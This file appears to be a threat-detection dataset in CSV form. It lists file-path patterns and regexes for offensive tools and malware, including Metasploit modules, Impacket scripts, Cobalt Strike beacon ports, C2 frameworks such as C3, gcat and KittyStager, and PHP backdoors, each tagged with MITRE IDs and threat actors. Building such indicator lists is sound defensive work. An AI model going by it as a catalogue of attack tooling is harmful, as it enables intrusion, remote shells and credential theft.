"*/ganglia-info.nse*",".{0,1000}\/ganglia\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7328"
"*/GatewayConsoleExe_d64.exe*",".{0,1000}\/GatewayConsoleExe_d64\.exe.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP -  C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","1","N/A","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","7329"
"*/gather/credentials*",".{0,1000}\/gather\/credentials.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","7330"
"*/gather/forensics*",".{0,1000}\/gather\/forensics.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","7331"
"*/gather/phish_windows_credentials*",".{0,1000}\/gather\/phish_windows_credentials.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","Framework","https://github.com/rapid7/metasploit-payloads","1","0","#linux","N/A","10","10","1819","689","2025-02-13T15:01:44Z","2014-04-03T21:18:24Z","7332"
"*/gato/*attack.py*",".{0,1000}\/gato\/.{0,1000}attack\.py.{0,1000}","offensive_tool_keyword","gato","GitHub Self-Hosted Runner Enumeration and Attack Tool","T1083 - T1087 - T1081","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/praetorian-inc/gato","1","1","N/A","N/A","N/A","7","630","55","2025-04-10T23:25:04Z","2023-01-06T15:43:27Z","7333"
"*/gato_x-0.5.2.tar.gz*",".{0,1000}\/gato_x\-0\.5\.2\.tar\.gz.{0,1000}","offensive_tool_keyword","Gato-X","automate advanced enumeration and exploitation techniques against GitHub repositories and organizations","T1190 - T1083 - T1588 - T1587","TA0001 - TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/adnanekhan/Gato-X","1","1","N/A","N/A","7","3","270","35","2025-04-21T17:57:09Z","2024-01-27T18:55:16Z","7334"
"*/gato_x-0.5.3.tar.gz*",".{0,1000}\/gato_x\-0\.5\.3\.tar\.gz.{0,1000}","offensive_tool_keyword","Gato-X","automate advanced enumeration and exploitation techniques against GitHub repositories and organizations","T1190 - T1083 - T1588 - T1587","TA0001 - TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/adnanekhan/Gato-X","1","1","N/A","N/A","7","3","270","35","2025-04-21T17:57:09Z","2024-01-27T18:55:16Z","7335"
"*/Gato-X.git*",".{0,1000}\/Gato\-X\.git.{0,1000}","offensive_tool_keyword","Gato-X","automate advanced enumeration and exploitation techniques against GitHub repositories and organizations","T1190 - T1083 - T1588 - T1587","TA0001 - TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/adnanekhan/Gato-X","1","1","N/A","N/A","7","3","270","35","2025-04-21T17:57:09Z","2024-01-27T18:55:16Z","7336"
"*/Gay Porn Mailer.exe*",".{0,1000}\/Gay\sPorn\sMailer\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","7337"
"*/GC2-sheet/*",".{0,1000}\/GC2\-sheet\/.{0,1000}","offensive_tool_keyword","GC2-sheet","GC2 is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrate data using Google Drive.","T1071.002 - T1560 - T1105","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/looCiprian/GC2-sheet","1","1","N/A","N/A","10","10","578","111","2025-03-28T19:48:36Z","2021-09-15T19:06:12Z","7338"
"*/gcat.git*",".{0,1000}\/gcat\.git.{0,1000}","offensive_tool_keyword","gcat","A PoC backdoor that uses Gmail as a C&C server","T1071.001 - T1094 - T1102.002","TA0011 - TA0010 - TA0008","N/A","Sandworm","C2","https://github.com/byt3bl33d3r/gcat","1","1","N/A","N/A","10","10","1332","425","2018-11-16T13:43:15Z","2015-06-03T01:28:00Z","7339"
"*/gcat.py",".{0,1000}\/gcat\.py","offensive_tool_keyword","gcat","A PoC backdoor that uses Gmail as a C&C server","T1071.001 - T1094 - T1102.002","TA0011 - TA0010 - TA0008","N/A","Sandworm","C2","https://github.com/byt3bl33d3r/gcat","1","1","N/A","N/A","10","10","1332","425","2018-11-16T13:43:15Z","2015-06-03T01:28:00Z","7340"
"*/geacon.git*",".{0,1000}\/geacon\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/darkr4y/geacon","1","0","N/A","N/A","10","10","1189","206","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z","7341"
"*/geacon/*beacon*",".{0,1000}\/geacon\/.{0,1000}beacon.{0,1000}","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/darkr4y/geacon","1","1","N/A","N/A","10","10","1189","206","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z","7342"
"*/geacon_pro*",".{0,1000}\/geacon_pro.{0,1000}","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/darkr4y/geacon","1","1","N/A","N/A","10","10","1189","206","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z","7343"
"*/gecko-new.php*",".{0,1000}\/gecko\-new\.php.{0,1000}","offensive_tool_keyword","Gecko","Gecko Backdoor is a  web php backdoor","T1100 - T1059 - T1105 - T1203","TA0011 - TA0003","N/A","N/A","C2","https://github.com/MadExploits/Gecko","1","1","N/A","N/A","10","10","118","56","2025-02-08T17:50:28Z","2022-07-15T05:51:04Z","7344"
"*/gecko-old.php*",".{0,1000}\/gecko\-old\.php.{0,1000}","offensive_tool_keyword","Gecko","Gecko Backdoor is a  web php backdoor","T1100 - T1059 - T1105 - T1203","TA0011 - TA0003","N/A","N/A","C2","https://github.com/MadExploits/Gecko","1","1","N/A","N/A","10","10","118","56","2025-02-08T17:50:28Z","2022-07-15T05:51:04Z","7345"
"*/Gemail-Hack.git*",".{0,1000}\/Gemail\-Hack\.git.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/Ha3MrX/Gemail-Hack","1","1","N/A","N/A","7","10","1062","400","2024-01-17T15:12:44Z","2018-04-19T13:48:41Z","7346"
"*/generate_bind_fuegoshell.ps1*",".{0,1000}\/generate_bind_fuegoshell\.ps1.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","1","N/A","N/A","10","1","44","7","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z","7348"
"*/generate_reverse_fuegoshell.ps1*",".{0,1000}\/generate_reverse_fuegoshell\.ps1.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","1","N/A","N/A","10","1","44","7","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z","7349"
"*/genHTA*",".{0,1000}\/genHTA.{0,1000}","offensive_tool_keyword","genHTA","Generates anti-sandbox analysis HTA files without payloads. anti-sandbox analysis HTA File Generator","T1564 - T1059 - T1027 - T1055","TA0002 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/mdsecactivebreach/genHTA","1","0","#linux","N/A","N/A","1","15","3","2017-03-16T21:49:59Z","2017-06-12T10:58:35Z","7350"
"*/GetADComputers.py*",".{0,1000}\/GetADComputers\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","7351"
"*/GetADUsers.py*",".{0,1000}\/GetADUsers\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","7352"
"*/Getallregvalues.txt*",".{0,1000}\/Getallregvalues\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#registry","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","7353"
"*/getArch.py*",".{0,1000}\/getArch\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","7354"
"*/GetBrowsers.ps1*",".{0,1000}\/GetBrowsers\.ps1.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","7355"
"*/getChatAdministrators?chat_id=1002168553106*",".{0,1000}\/getChatAdministrators\?chat_id\=1002168553106.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","1","N/A","N/A","10","7","N/A","N/A","N/A","N/A","7356"
"*/get-clipboard.py*",".{0,1000}\/get\-clipboard\.py.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","7357"
"*/get-desc-users.py*",".{0,1000}\/get\-desc\-users\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#linux","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","7358"
"*/Get-GPPPassword.ps1*",".{0,1000}\/Get\-GPPPassword\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","7359"
"*/Get-GPPPassword.py*",".{0,1000}\/Get\-GPPPassword\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","7360"
"*/Get-InfectedThread.ps1*",".{0,1000}\/Get\-InfectedThread\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","7361"
"*/Get-InjectedThread.ps1*",".{0,1000}\/Get\-InjectedThread\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","7362"
"*/GetLAPSPassword.py*",".{0,1000}\/GetLAPSPassword\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","7363"
"*/getLegit/cdnl*",".{0,1000}\/getLegit\/cdnl.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","7364"
"*/getLegit/grkg*",".{0,1000}\/getLegit\/grkg.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","7365"
"*/getLegit/prvw*",".{0,1000}\/getLegit\/prvw.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","7366"
"*/getLegit/qhwl*",".{0,1000}\/getLegit\/qhwl.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","7367"
"*/getLegit/tsom*",".{0,1000}\/getLegit\/tsom.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","7368"
"*/getLegit/zijz*",".{0,1000}\/getLegit\/zijz.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","7369"
"*/get-loggedon/*.c*",".{0,1000}\/get\-loggedon\/.{0,1000}\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 